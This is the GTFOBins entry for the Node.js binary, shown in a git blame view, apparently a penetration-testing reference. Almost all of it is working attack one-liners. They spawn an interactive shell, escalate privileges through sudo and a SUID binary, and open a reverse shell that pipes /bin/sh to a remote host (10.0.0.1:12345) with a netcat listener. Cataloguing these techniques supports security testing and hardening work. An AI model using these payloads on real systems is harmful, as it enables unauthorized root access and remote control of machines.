GTFOBins.github.io/_gtfobins/node.md

24 lines
837 B
Markdown
Raw Normal View History

2018-05-23 20:47:50 +02:00
---
functions:
2018-05-23 21:17:43 +02:00
exec-interactive:
- code: |
2018-05-24 00:37:13 +02:00
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
2018-05-23 21:17:43 +02:00
sudo-enabled:
- code: |
2018-05-24 00:37:13 +02:00
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
2018-05-23 21:17:43 +02:00
suid-enabled:
- code: |
2018-05-24 00:37:13 +02:00
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
2018-05-23 20:47:50 +02:00
reverse-shell:
- description: Run `nc -l -p 12345` to receive the shell on the other end.
code: |
export RHOST=10.0.0.1
export RPORT=12345
2018-05-24 00:37:13 +02:00
node -e 'sh = require("child_process").spawn("/bin/sh");
2018-05-23 20:47:50 +02:00
client = new require("net").Socket();
2018-05-24 00:37:13 +02:00
client.connect(process.env.RPORT, process.env.RHOST, function () {
2018-05-23 20:47:50 +02:00
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});'
---